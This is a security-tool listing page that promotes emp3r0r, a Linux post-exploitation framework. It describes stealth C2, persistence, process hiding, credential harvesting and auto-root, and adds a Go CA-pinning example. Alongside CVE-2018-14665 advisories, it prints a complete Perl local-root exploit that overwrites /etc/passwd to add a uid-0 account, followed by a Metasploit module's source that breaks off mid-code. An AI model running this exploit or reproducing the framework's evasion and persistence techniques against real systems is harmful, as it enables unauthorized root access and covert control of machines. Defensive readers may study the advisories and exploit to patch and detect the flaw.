**Emp3R0R - Linux Post-Exploitation Framework Made By Linux User**

published 2021-01-09 by [KitPloit](http://www.kitploit.com/2021/01/emp3r0r-linux-post-exploitation.html); tool: https://github.com/jm33-m0/emp3r0r; related CVE: CVE-2018-14665 (bulletins at the end of the page)

[screenshot](https://1.bp.blogspot.com/-ebyn50hsMeU/X_lPY2STkrI/AAAAAAAAU5s/2Bq8MVwb26EODfof9fQDAAPOT8aPnGedgCNcBGAsYHQ/s1406/emp3r0r_01.png)

linux [post-exploitation](https://www.kitploit.com/search/label/Post-Exploitation) framework made by linux user

**Still under active development**

 * [Chinese introduction](https://www.freebuf.com/sectool/259079.html)
 * [check my blog for updates](https://jm33.me/emp3r0r-0x00.html)
 * [how to use](https://github.com/jm33-m0/emp3r0r/wiki)

**what to expect (in future releases)**

 * packer: cryptor + `memfd_create`
 * packer: use `shm_open` on older Linux kernels
 * dropper: shellcode injector - python
 * injector: inject shellcode into another process, using GDB
 * port mapping: forward from CC to agents, so you can encapsulate other tools (such as Cobalt Strike) in emp3r0r's CC tunnel
 * dropper: shellcode injector - dd
 * dropper: downloader (stage 0) shellcode
 * network scanner
 * passive scanner, for host/service discovery
 * exploit kit
 * conservative weak [credentials](https://www.kitploit.com/search/label/Credentials) scanner
 * auto pwn using weak credentials and RCEs

**why another post-exploitation tool?**

why not? I don't see many post-exploitation frameworks for Linux systems, and even where they exist, they are nothing like mine

as a Linux user, the most critical thing for [remote administration](https://www.kitploit.com/search/label/Remote%20Administration) is the **terminal**. if you hate the garbage reverse shell experience (sometimes it isn't even a shell), take a look at emp3r0r, you will be impressed

yes, I just want to make a post-exploitation tool for Linux users like me, who want a better experience in their hacking

another reason is compatibility. as emp3r0r is mostly written in [Go](https://golang.org) and is fully static (so are all the plugins used by emp3r0r), it will run anywhere you want (tested on Linux 2.6 and above), however hostile the environment. in some cases you won't even find bash on your target; don't worry, emp3r0r uploads its own [bash](https://github.com/jm33-m0/static-bins/tree/main/vaccine) and many other useful tools

why is it called `emp3r0r`? because there's an [empire](https://github.com/BC-SECURITY/empire)

I hope this tool helps you, and I will add features to it as I learn new things

**what does it do**

**glance**

 * beautiful terminal UI
 * **perfect reverse shell** (true color, key bindings, custom bashrc, custom bash binary, etc)
 * auto **persistence** via various methods
 * **post-exploitation tools** like nmap and socat, integrated with the reverse shell
 * **credential harvesting**
 * process **injection**
 * ELF **patcher**
 * **hide processes and files** via libc hijacking
 * port mapping, socks5 **proxy**
 * auto root
 * **LPE** suggest
 * system info collecting
 * file management
 * log cleaner
 * **stealth** connection
 * internet access checker
 * **autoproxy** for semi-isolated networks
 * all of these in one **HTTP2** connection
 * can be encapsulated in any external proxy such as **TOR**, and **CDNs**
 * and many more...
**core features**

**transports**

emp3r0r uses [HTTP2](https://github.com/posener/h2conn) (over TLS) for its CC communication, but you can also encapsulate it in other transports such as [TOR](https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor) and [CDNs](https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#cdn). all you need to do is [tell the emp3r0r agent to use your proxy](https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#tor-1)

emp3r0r also has its own CA pool: agents trust only emp3r0r's own CA (which you can [generate](https://github.com/jm33-m0/emp3r0r/wiki/Getting-started#build-cc) using `build.py`). this makes a MITM attack much harder, since an interceptor needs a certificate chained to that CA rather than one merely trusted by the target host's system store

below is a screenshot of emp3r0r's CC server, with 3 agents coming in over 3 different transports

[screenshot](https://1.bp.blogspot.com/-RDh3XVUeUZ0/X_lPiSvxCnI/AAAAAAAAU5w/sUXx4qinrFUWjS3HWtwWt1Y6YYgFP8eJgCNcBGAsYHQ/s1406/emp3r0r_01.png)

**auto proxy for agents without direct internet access**

emp3r0r agents check whether they have internet access on start. if they do, they start a socks5 proxy and then broadcast its address (in encrypted form) on every network they can reach

an agent without internet instead listens for such broadcasts. when it receives a working proxy, it starts a port mapping to that proxy and broadcasts the mapped address on its own networks, passing the proxy on to every agent it can reach, and eventually bringing all agents to our CC server
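The CA pinning described under transports above, as an added Go example that is not emp3r0r's own code: a throwaway CA and a server leaf are generated in memory, and the agent-side check accepts only a chain to that CA for an assumed hostname `cc.example.internal` (the hostname, CA names and one-day lifetimes are all demo assumptions). A second CA standing in for an interceptor issues a leaf for the same hostname; it is rejected even though it is otherwise well-formed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt"
	"math/big"
	"time"
)

// ca is a throwaway CA built in memory. Its PEM certificate is what an agent
// would carry from build time; the signing key stays with the CC operator.
type ca struct {
	cert *x509.Certificate
	key  *ecdsa.PrivateKey
	PEM  []byte
}

// newCA self-signs a CA certificate valid for one day (demo lifetime).
func newCA(name string) (*ca, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: name},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true, KeyUsage: x509.KeyUsageCertSign,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return nil, err
	}
	return &ca{cert: cert, key: key, PEM: pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})}, nil
}

// issueServerCert signs a TLS server leaf for host with this CA.
func (c *ca) issueServerCert(host string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2), Subject: pkix.Name{CommonName: host}, DNSNames: []string{host},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour),
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, c.cert, &key.PublicKey, c.key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// agentVerify is the check an agent applies to the certificate the CC presents:
// chain to the pinned CA only, for the expected hostname. The host's system
// trust store is never consulted, so a leaf from a public CA, or from a
// TLS-inspecting proxy the host trusts, fails as well.
func agentVerify(pinnedCAPEM []byte, leaf *x509.Certificate, host string) error {
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(pinnedCAPEM) {
		return fmt.Errorf("pinned CA PEM did not parse")
	}
	_, err := leaf.Verify(x509.VerifyOptions{
		Roots: pool, DNSName: host,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	})
	return err
}

// Demo pins the genuine CA, then checks a leaf it issued and a leaf for the
// same hostname issued by an interceptor's CA. Expected result: true, false.
func Demo() (genuineAccepted, impostorAccepted bool, err error) {
	const host = "cc.example.internal" // assumed CC hostname for the demo
	genuine, err := newCA("emp3r0r demo CA")
	if err != nil {
		return false, false, err
	}
	realLeaf, err := genuine.issueServerCert(host)
	if err != nil {
		return false, false, err
	}
	impostor, err := newCA("interceptor CA") // a MITM box with its own CA
	if err != nil {
		return false, false, err
	}
	fakeLeaf, err := impostor.issueServerCert(host) // right hostname, wrong issuer
	if err != nil {
		return false, false, err
	}
	return agentVerify(genuine.PEM, realLeaf, host) == nil, agentVerify(genuine.PEM, fakeLeaf, host) == nil, nil
}

func main() {
	g, i, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine CC cert accepted: %v\nimpostor cert accepted: %v\n", g, i)
}
```

In a real client the same check is what `tls.Config{RootCAs: pool, ServerName: host}` performs during the handshake; the point is that `RootCAs` replaces the system store rather than extending it. The operational flip side is that if the CC's leaf expires or the CA is rotated, every deployed agent loses its connection until it is rebuilt with the new CA.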
in the following example we have 3 agents, of which only one (`[1]`) has internet access, and `[0]` has to use the proxy passed on by `[2]`

[screenshot](https://1.bp.blogspot.com/-6JSXZbLtxEo/X_lPoUVw4FI/AAAAAAAAU50/_qpNf6-TimEcJJj8XvcDQtG4fjV_rUVVACNcBGAsYHQ/s880/emp3r0r_02.png)

**agent traffic**

every time an agent starts, it checks a preset URL for the CC status. if that says the CC is offline, no further action is taken; the agent waits for the CC to come online

you can set the URL to a GitHub page or another less suspicious site; your agents will poll that URL at a random interval measured in minutes

no CC communication happens while the agent thinks the CC is offline

if it isn't, the traffic looks like this:

bare HTTP2 traffic:

[screenshot](https://1.bp.blogspot.com/-aSsDA_EsuOc/X_lPuif28xI/AAAAAAAAU58/kki2axaE3XQykmyy9xbNwn4SXw8ziW2wgCNcBGAsYHQ/s1754/emp3r0r_03.png)

when using Cloudflare CDN as the CC frontend:

[screenshot](https://1.bp.blogspot.com/-UzeO5H62uss/X_lP5OO4wUI/AAAAAAAAU6E/WYva575RkPMSzlwR73P5cCPQzX_UjCoRgCNcBGAsYHQ/s1920/emp3r0r_04.png)

**packer - start agent in memory**

[packer](https://github.com/jm33-m0/emp3r0r/wiki/Packer) encrypts the `agent` binary and runs it from memory (using `memfd_create`)

used with this packer, emp3r0r is currently mostly memory-based

[screenshot](https://1.bp.blogspot.com/-x1e8iTZUB9s/X_lQBPOAZTI/AAAAAAAAU6M/gwsOguKPeN0mzWW9Sp8bU30FtviKwUL9gCNcBGAsYHQ/s1758/emp3r0r_05.png)

**dropper - pure memory based agent launching**

[dropper](https://github.com/jm33-m0/emp3r0r/wiki/Dropper) drops shellcode or a script on your target which eventually runs your agent, in a stealthy way

below is a screenshot of python-based shellcode delivery through to agent execution:

[screenshot](https://github.com/jm33-m0/emp3r0r/blob/master/img/dropper.webp)

**hide processes and files**

currently emp3r0r uses [libemp3r0r](https://github.com/jm33-m0/emp3r0r/tree/master/libemp3r0r) to hide its files and processes, which relies on glibc hijacking

**persistence**

currently implemented methods:

 * [libemp3r0r](https://github.com/jm33-m0/emp3r0r/tree/master/libemp3r0r)
 * cron
 * bash profile and command injection

more will be added in the future

**modules**

**basic command shell**

this is **not a shell**: it just executes any command you send with `sh -c` and sends the result back to you

besides that, it provides several useful helpers:

 * file management: `put` and `get`
 * command autocompletion
 * `#net` shows basic network info, such as `ip a`, `ip r`, `ip neigh`
 * `#kill` processes, and a simple `#ps`
 * `bash` !!! this is the real bash shell, keep reading!

[screenshot](https://1.bp.blogspot.com/-4CKoYSXwrx4/X_lQLa7qBYI/AAAAAAAAU6U/zWEj7WzLlPI5MSMX7Ly37lbSXn9J9fmkQCNcBGAsYHQ/s1405/emp3r0r_07.png)

**fully interactive and stealth bash shell**

a reverse bash shell, started with a custom `bash` binary and `bashrc`, leaving no trace on the system shell

emp3r0r's terminal supports **everything your current terminal supports**; you can use it just like an [openssh](https://www.openssh.com/) session

but wait, it's more than just a reverse bash shell: with [module vaccine](https://github.com/jm33-m0/static-bins/tree/main/vaccine), you can use whatever tool you like on your target system

[screenshot](https://1.bp.blogspot.com/-6TRtZgfuCTU/X_lQUVOk_cI/AAAAAAAAU6c/yjFUFPswZ1UPybunzvI1FQnvp_rAXUk7ACNcBGAsYHQ/s1412/emp3r0r_08.png)

**credential harvesting**

not implemented yet

I wrote about this in my [blog](https://jm33.me/sshd-injection-and-password-harvesting.html)

**auto root**

currently emp3r0r supports [CVE-2018-14665](https://jm33.me/sshd-injection-and-password-harvesting.html); agents exploit this [vulnerability](https://www.kitploit.com/search/label/Vulnerability) if possible and restart themselves with root privileges. note that this only applies where the target runs a setuid-root Xorg X server older than 1.20.3 (1.19.0 and later are affected) that the agent's user is allowed to start; see the bulletins at the end of the page

[screenshot](https://1.bp.blogspot.com/-2hJDiez46XA/X_lQbzj0wpI/AAAAAAAAU6k/lGIslle3NcolgrHjmuzf75hZL8PljmKiwCNcBGAsYHQ/s680/emp3r0r_09.png)

**LPE suggest**

uploads the latest:

 * [mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
 * [pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)

runs them on the target system, and returns the results

[screenshot](https://1.bp.blogspot.com/-dwR5eysxREw/X_lQhIRfQNI/AAAAAAAAU6o/homwn1vZglwtF2fJxPo7hb9h3Dy67Cc6wCNcBGAsYHQ/s1280/emp3r0r_10.png)

**port mapping**

map any target address to the CC side, using HTTP2 (or whatever transport your agent uses)

[screenshot](https://1.bp.blogspot.com/-QVv1X1MFq9o/X_lQmgsCpZI/AAAAAAAAU6w/Z75lOl5o0fQZytPA-QdA3g_Woqgw97tygCNcBGAsYHQ/s1134/emp3r0r_11.png)

**plugin system**

yes, there is a plugin system. please read the [wiki](https://github.com/jm33-m0/emp3r0r/wiki/Plugins) for more information

[screenshot](https://1.bp.blogspot.com/-QWG5o2SiEv8/X_lQsm2SndI/AAAAAAAAU64/MjjHhhBShbwj6GanqGltpc2OXasKPww7gCNcBGAsYHQ/s817/emp3r0r_12.png)

[screenshot](https://1.bp.blogspot.com/-95HW3W3R-Pg/X_lQsjAIS8I/AAAAAAAAU68/tFOALiRQbi86nFjeaiQowidctPsS3-vPgCNcBGAsYHQ/s1274/emp3r0r_13.png)

**thanks**

 * [pty](https://github.com/creack/pty)
 * [guitmz](https://github.com/guitmz)
 * [readline](https://github.com/bettercap/readline)
 * [h2conn](https://github.com/posener/h2conn)
 * [diamorphine](https://github.com/m0nad/Diamorphine)
 * [Upgrading Simple Shells to Fully Interactive TTYs](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)

**[Download Emp3R0R](https://github.com/jm33-m0/emp3r0r)**
**related bulletins for CVE-2018-14665**

**CVE-2018-14665** (NVD; published 2018-10-25, modified 2019-10-22; CWE-863)

A flaw was found in xorg-x11-server before 1.20.3: an incorrect permission check for the -modulepath and -logfile options when starting Xorg. The X server allows unprivileged users with the ability to log in to the system via the physical console to escalate their privileges and run arbitrary code with root privileges.

 * CVSS v3.0: 6.6 Medium, CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 * CVSS v2.0: 7.2 High, AV:L/AC:L/Au:N/C:C/I:C/A:C
 * affected platforms listed by NVD: Red Hat Enterprise Linux 7 Server, Workstation and Desktop; RHEL Server 7.6 AUS, EUS and TUS; Ubuntu 16.04 LTS, 18.04 LTS and 18.10; Debian 9.0
 * https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14665

**F5:K03073656 - X.Org X server vulnerability CVE-2018-14665** (2018-11-24, https://support.f5.com/csp/article/K03073656)

F5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.

 * [K51812227: Understanding Security Advisory versioning](https://support.f5.com/csp/article/K51812227)
 * [K41942608: Overview of AskF5 Security Advisory articles](https://support.f5.com/csp/article/K41942608)
 * [K4602: Overview of the F5 security vulnerability response policy](https://support.f5.com/csp/article/K4602)
 * [K9970: Subscribing to email notifications regarding F5 products](https://support.f5.com/csp/article/K9970)
 * [K9957: Creating a custom RSS feed to view new and updated documents](https://support.f5.com/csp/article/K9957)

**CESA-2018:3410 - xorg security update** (CentOS; published 2018-11-15, modified 2018-12-13)

X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.

Security fix(es):

 * xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation (CVE-2018-14665)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Narendra Shinde for reporting this issue.

Merged security bulletin from advisories:

 * http://lists.centos.org/pipermail/centos-announce/2018-December/035169.html
 * http://lists.centos.org/pipermail/centos-cr-announce/2018-November/005745.html

Affected packages: xorg-x11-server, xorg-x11-server-Xdmx, xorg-x11-server-Xephyr, xorg-x11-server-Xnest, xorg-x11-server-Xorg, xorg-x11-server-Xvfb, xorg-x11-server-Xwayland, xorg-x11-server-common, xorg-x11-server-devel, xorg-x11-server-source

**X.Org Flaw Allows Privilege Escalation in Linux Systems** (Threatpost, 2018-10-29, https://threatpost.com/x-org-flaw-allows-privilege-escalation-in-linux-systems/138624/)

A local privilege-escalation and file-overwrite vulnerability in X.Org X server opens the door to trivial compromise in Linux systems that use the open-source software.

The X server is a core graphics and windowing technology that can be found in most Linux and BSD distributions that use a graphical user interface (GUI). The vulnerability ([CVE-2018-14665](https://access.redhat.com/security/cve/cve-2018-14665)) affects X server versions 1.19 and later, and has been around for at least two years. X.Org explained that if a vulnerable version of X.org runs on a system as "setuid" root, a logged-in user can use it to gain administrator-level privileges on the machine. From there, the user can create or overwrite files anywhere on the system, including files owned by privileged users (i.e., an adversary could tamper with data or install malware).

Uncovered by security researcher Narendra Shinde, the issue arises because of an "incorrect command-line parameter validation." Essentially, the system doesn't check for correct permissions when someone uses the -modulepath or -logfile command line switches; both are handled by the root-privileged X.org process.

Red Hat issued its own [report](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665), describing the vulnerability as "an incorrect permission check for -modulepath and -logfile options when starting X.Org." As such, "X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges."

In the case of -modulepath, a user can inject code into the process; while the -logfile option can be used to overwrite the "shadow" password file so that the root user can log on without authentication.

"Overwriting /etc/shadow with -logfile can also lead to privilege-elevation since it's possible to control some part of the written log file, for example using the -fp option to set the font search path (which is logged) and thus inject a line that will be considered as valid by some systems," X.Org said in a mailing list [post](https://lists.x.org/archives/xorg-announce/2018-October/002927.html) last week.

The attacker needs to already have an active console session going in order to successfully exploit the problem, according to Shinde; in other words, the vulnerability won't let an attacker gain initial access to the system. He explained in a separate [posting](https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html) that "unpatched systems can be exploited by non-root users if X server is running with elevated privileges."

Other researchers noted however that when used in combination with other exploits, it's possible for adversaries to gain complete control if they already have a lower privileged account.

Matthew Hickey of Hacker House for instance [shared](https://twitter.com/hackerfantastic/status/1055568290112831490/) a proof-of-concept exploit on Twitter, noting that the flaw is easy to exploit: "CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less."

The issue was also [confirmed](https://twitter.com/_bcoles/status/1055593201539538944) by security researcher Brendan Coles as working on CentOS 7.4, though he called the scenario "unlikely" given the need for an attacker to already have access to the system.

A [patch](https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330e) is available in the X server repository, and many distros, including [OpenBSD](https://ftp.openbsd.org/pub/OpenBSD/patches/6.4/common/001_xserver.patch.sig), [Red Hat](https://access.redhat.com/security/cve/cve-2018-14665), [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14665.html), [Debian](https://security-tracker.debian.org/tracker/CVE-2018-14665), [SUSE](https://www.suse.com/security/cve/CVE-2018-14665/) and [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1643131), have issued their own advisories.
X.Org also said that there's a workaround:

> "If a patched version of the X server is not available, X.Org recommends to remove the setuid bit (ie chmod 755) of the installed Xorg binary. Note that this can cause issues if people are starting the X window system using the 'startx', 'xinit' commands or variations thereof."

Linux distros that don't use X.org with elevated privileges are immune from the flaw.

Security firm Tenable [issued](https://www.tenable.com/blog/tweetable-exploit-for-x-org-server-local-privilege-escalation-cve-2018-14665-released) its own assessment: "Because of the limited range of affected versions and the specific and often non-default configurations required to trigger this exploit, the attack's scope appears to be narrow. However, it's likely that malicious individuals will still seek out vulnerable systems."

**1337DAY-ID-31731 - Xorg X11 Server (AIX) - Local Privilege Escalation Exploit** (0day.today, 2018-12-04, https://0day.today/exploit/31731; exploit for the AIX platform, category local exploits)

The script below is the exploit as posted, with the quoted-printable line wrapping and `=3D`/`=20` escapes of the captured copy repaired and `use strict`/`use warnings` plus lexical declarations added; its behaviour is unchanged. It abuses `-logfile` with a relative path so that the setuid Xorg overwrites /etc/passwd, and smuggles a root-equivalent `wow` entry into that log through the `-config` argument, which Xorg echoes into the log file. Note that it writes the new passwd file from only the currently logged-in users' entries, then restores the backup and appends `wow`, so anything that reads /etc/passwd in between sees a truncated file.

```perl
#!/usr/bin/perl
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root

use strict;
use warnings;

print "[+] AIX X11 server local root exploit\n";

# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp(my $xorg = `command -v Xorg`);
if ($xorg eq "") {
    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
    exit;
}

# Check ksh93 is in path
chomp(my $ksh = `command -v ksh93`);
if ($ksh eq "") {
    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
    exit;
}

# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open(my $passwd_fh, '<', "/etc/passwd") or die "cannot open /etc/passwd: $!";
chomp(my @passwd_array = <$passwd_fh>);
close($passwd_fh);

# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
my @users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);

# For all logged in users, add their current passwd entry to the string
# that will be used to overwrite passwd
my $users_logged_in_passwd = '';
foreach my $user (@users) {
    $user .= ":";
    foreach my $line (@passwd_array) {
        if (index($line, $user) == 0) {
            $users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
        }
    }
}

# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to the log.
# The argument is a ksh93 $'...' ANSI-C string, so the '\n' sequences become real newlines
# when Xorg echoes it into the "log" (which is /etc/passwd).
print "[-] Generating Xorg command \n";
my $blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';

print "[-] Opening /tmp/wow.ksh \n";
open(my $fr, '>', "/tmp/wow.ksh") or die "cannot open /tmp/wow.ksh: $!";

# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;

# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");

# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");

# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
my $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;

print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
```

**Metasploit module entry** (0day.today; the record is cut off on the page)

This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running.
On successful exploitation artifacts will be created consistent with starting Xorg.", "edition": 1, "published": "2019-10-22T00:00:00", "title": "Xorg X11 Server SUID modulepath Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-10-22T00:00:00", "id": "1337DAY-ID-33404", "href": "https://0day.today/exploit/description/33404", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::Linux::System\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. 
This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On successful exploitation artifacts will be created consistant\r\n with starting Xorg.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Aaron Ringo', # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]\r\n ],\r\n 'Platform' => %w[linux unix solaris],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X64 } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86 } ],\r\n ['Solaris x86', {\r\n 'Platform' => [ 'solaris', 'unix' ],\r\n 'Arch' => ARCH_SPARC } ],\r\n ['Solaris x64', {\r\n 'Platform' => [ 'solaris', 'unix' ],\r\n 'Arch' => ARCH_SPARC } ],\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),\r\n OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if 
datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist? \"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not 